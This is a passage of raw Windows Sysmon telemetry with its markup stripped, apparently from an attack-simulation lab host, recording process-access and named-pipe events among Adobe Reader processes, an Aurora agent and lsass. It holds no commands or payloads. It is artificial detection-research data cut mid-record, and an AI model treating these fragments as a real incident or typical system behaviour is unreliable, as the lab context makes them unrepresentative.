DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 18141800x800000000000000046958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.866{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.11717610337520370599C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.866{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.11717610337520370599C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 18141800x800000000000000046956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.866{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.6708052828452768907C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.866{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.6944.6708052828452768907C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.858{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.857{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.854{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000046951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.854{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000046950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.854{FE4C2B44-E650-63C7-8906-00000000AF02}37966944C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2d342d7(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+11f6df2(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efed18(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2efeba0(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4734(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+39b4223(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9a5cd(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c9b4f4(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+3846340(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c991da(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99794(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+2c99674(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\libcef.dll+40cbbf(wow64) 10341000x800000000000000046949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.848{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.847{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.845{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.845{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.845{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.845{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.844{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.843{FE4C2B44-E64A-63C7-8706-00000000AF02}14002148C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 